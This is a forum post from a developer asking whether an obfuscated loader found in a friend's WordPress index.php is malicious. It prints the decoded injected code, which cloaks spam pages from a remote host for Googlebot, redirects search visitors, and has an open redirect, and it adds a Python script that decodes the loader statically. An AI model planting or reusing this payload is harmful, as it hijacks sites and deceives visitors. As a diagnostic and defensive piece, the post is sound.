Lemme preface this with I’m a python backend dev and I have almost zero php and wordpress experience. I’m going by intuition and dead reckoning mostly. My friend calls me in a panic and tells me her website has started showing this error at the top of the page:
`Notice: Undefined index: HTTP_REFERER in REDACTED/index.php(9) : eval()'d code on line 15`
I dug into the web server and found the `index.php` file in question, which looked like this:
```php
<?php function OFgP($nGtfQ)
{
// Injected loader: base64-decode, gzinflate, then subtract 1 from every byte before eval()
$nGtfQ=gzinflate(base64_decode($nGtfQ));
for($i=0;$i<strlen($nGtfQ);$i++)
{
$nGtfQ[$i] = chr(ord($nGtfQ[$i])-1);
}
return $nGtfQ;
}eval(OFgP("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"));?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
```
Looks like some obfuscation, which made me raise an eyebrow, but for all I know, some plugin generated this. Here’s the decloaked code:
```php
// Only request paths shaped like /abc_123/xyz.gao are treated as "spam pages" below
$regex = "/^\/[A-Za-z0-9]+\_[A-Za-z0-9]+\/[A-Za-z0-9\_]+\.gao+$/";
$query = $_SERVER['REQUEST_URI'];
// Any request mentioning sitemap.xml gets a sitemap.xml read from the web root
if(strstr($query,"sitemap.xml")){
echo GetFileContent("sitemap.xml");exit;
}
// Cloaking: clients claiming to be Googlebot get page content fetched live from the remote server
if(stripos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false){
if(isset($query) && preg_match($regex,$query)){
$str = GetFileContent("http://fromjpn.com/cokrfirst/0801kr811/pages.php?".$query."|".$_SERVER["HTTP_HOST"]);
echo $str;
exit;
}
}
// Visitors arriving from a search engine are redirected with JavaScript; reading HTTP_REFERER
// when the browser sent no Referer header is what produces the "Undefined index" notice
if(preg_match('/(google.com|google.co.kr|yahoo.com|bing.com|naver.com)/i', strtolower($_SERVER['HTTP_REFERER']))){
if(isset($query) && preg_match($regex,$query)){
echo '<script>document.location=("http://fromjpn.com/cokrfirst/0801kr811/gonews.php?'.trim($query).'");</script>';
exit;
}else{
}
}
// Open redirect: ?uu=<anything> is passed straight into the redirect URL
if($_GET['uu']!=""){
echo '<script>document.location=("http://fromjpn.com/cokrfirst/0801kr811/gonews.php?'.trim($_GET['uu']).'");</script>';
exit;
}
// Fetch a URL or local path, falling back to curl when file_get_contents() is disabled
function GetFileContent($url){
if(function_exists('file_get_contents')) {
$file_contents = file_get_contents($url);
} else {
$ch = curl_init();
$timeout = 5;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
}
return $file_contents;
}
```
I visited `fromjpn.com` in a sandbox and it redirects to some sort of spammy/weeb looking hangul site. Is this doing anything actually for the functionality of the site, or is this some sort of exploit that somehow got injected into the `index.php` file?
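A static way to unwrap a loader like the one in that `index.php`, written in Python as an added example (not part of the original post): it reverses the OFgP() steps (base64, raw DEFLATE, minus one per byte) without ever calling `eval`, so the hidden code can be read instead of run, and it follows nested wrappers in case a payload is itself wrapped again. The decoder name `OFgP`, the `peel_layers` helper and the sample file are assumptions or constructed fixtures.

```python
import base64
import re
import zlib

# Matches the wrapper seen in the infected index.php: eval(<decoder>("<base64 blob>"))
EVAL_WRAPPER_RE = re.compile(
    r"eval\(\s*([A-Za-z_]\w*)\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)\s*\)"
)


def decode_payload(blob: str) -> str:
    """Statically reverse OFgP(): base64 -> raw DEFLATE (PHP gzinflate) -> minus 1 per byte. Nothing runs."""
    inflated = zlib.decompress(base64.b64decode(blob), wbits=-15)  # -15 = raw DEFLATE, no zlib header
    # PHP's chr(ord($c)-1) wraps 0 around to 255, so apply the same modulo.
    return bytes((b - 1) % 256 for b in inflated).decode("latin-1")


def peel_layers(php_source: str, max_depth: int = 5) -> list[tuple[str, str]]:
    """Return (decoder_name, decoded_text) per layer, following nested eval(fn("...")) wrappers."""
    layers = []
    current = php_source
    for _ in range(max_depth):
        match = EVAL_WRAPPER_RE.search(current)
        if match is None:
            break
        name, blob = match.groups()
        current = decode_payload(blob)
        layers.append((name, current))
    return layers


def build_fixture(plain: str) -> str:
    """Constructed test fixture only: the inverse of decode_payload(), so the sample below is self-contained."""
    shifted = bytes((b + 1) % 256 for b in plain.encode("latin-1"))
    compressor = zlib.compressobj(wbits=-15)
    return base64.b64encode(compressor.compress(shifted) + compressor.flush()).decode("ascii")


# Constructed sample modelled on the infected file: decoder function, the eval line, then the
# untouched WordPress bootstrap. The hidden text is a harmless stand-in for the real payload.
HIDDEN_TEXT = "$query = $_SERVER['REQUEST_URI']; // constructed stand-in for the cloaking code"
SAMPLE_INDEX_PHP = (
    "<?php function OFgP($x){ /* ... */ return $x; }"
    + 'eval(OFgP("' + build_fixture(HIDDEN_TEXT) + '"));?>\n'
    + "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n"
)
```

Running `peel_layers()` over the real file (with the blob left in place) prints each decoded layer as text, which is what the "decloaked code" above is.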